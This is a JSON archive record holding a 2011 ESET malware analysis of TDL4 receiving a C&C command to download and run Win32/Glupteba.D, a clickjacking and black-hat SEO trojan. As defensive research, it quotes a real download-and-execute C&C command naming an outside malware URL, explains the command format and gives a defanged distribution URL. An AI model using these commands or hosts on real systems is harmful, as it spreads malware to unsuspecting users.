{
	"id": "5bc3f3ed-c15a-4c60-918a-80a25d7bb759",
	"created_at": "2026-04-06T00:22:14.368242Z",
	"updated_at": "2026-04-10T03:21:45.943868Z",
	"deleted_at": null,
	"sha1_hash": "85d48226e4ee82885e5bf150356524e8d655daa9",
	"title": "TDL4 and Glupteba: Piggyback PiggyBugs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 130830,
	"plain_text": "TDL4 and Glupteba: Piggyback PiggyBugs\r\nBy David Harley\r\nArchived: 2026-04-05 16:12:55 UTC\r\n02 Mar 2011\r\nMy colleague Aleksandr Matrosov today received an interesting sample of TDL4 from another of my colleagues, Pierre-Marc Bureau: this sample downloads and installs another malicious program, Win32/Glupteba.D. This was the first instance he’d come across of TDL4 being used to install other malware, and here's his account of what he found.\r\nA sample of Win32/Olmarik.AOV was obtained from the URL hxxp://vidquick.info/cgi/icpcom.exe. After what looked like a standard TDL4 installation, at any rate in accordance with the most recent versions analysed, Win32/Olmarik.AOV received a command from the C\u0026C server to download and execute another binary file.\r\nThe C\u0026C command looks like this:\r\ntask_id = 2|10||http://wheelcars.ru/no.exe [Win32/Glupteba.D]\r\nCommands are formatted like this:\r\ntask_id = \u003ccommand_id\u003e\u003cencryption_key\u003e\u003cURL\u003e\r\nIn this particular case, the command ID corresponds to “DownloadAndExecute”: the encryption key is null and the command ID is 2 followed by 10.\r\nWin32/Glupteba.D uses blackhat SEO methods to push clickjacking contextual advertising used by the ad network Begun (http://www.begun.ru/), which has a high profile in Russia. Clickjacking algorithms have been developed for crawling web sites that push typical content for the specified contextual ads. All affected web sites are hosted by a single provider: “Masterhost.ru” is, in fact, the biggest Russian hosting provider.\r\nNetwork activity from Win32/Glupteba.D is shown in the following screendump:\r\nCommands from Win32/Glupteba.D to the C\u0026C look like this:\r\nThis is not a plugin for TDL4: it’s standalone malware, which can download and execute other binary modules independently. Win32/Glupteba.D is not integrated into TDL4 functionality.\r\nDavid Harley, ESET Senior Research Fellow\r\nAleksandr Matrosov, Senior Malware Researcher\r\nSource: https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/"
	],
	"report_names": [
		"tdl4-and-glubteba-piggyback-piggybugs"
	],
	"threat_actors": [],
	"ts_created_at": 1775434934,
	"ts_updated_at": 1775791305,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85d48226e4ee82885e5bf150356524e8d655daa9.pdf",
		"text": "https://archive.orkl.eu/85d48226e4ee82885e5bf150356524e8d655daa9.txt",
		"img": "https://archive.orkl.eu/85d48226e4ee82885e5bf150356524e8d655daa9.jpg"
	}
}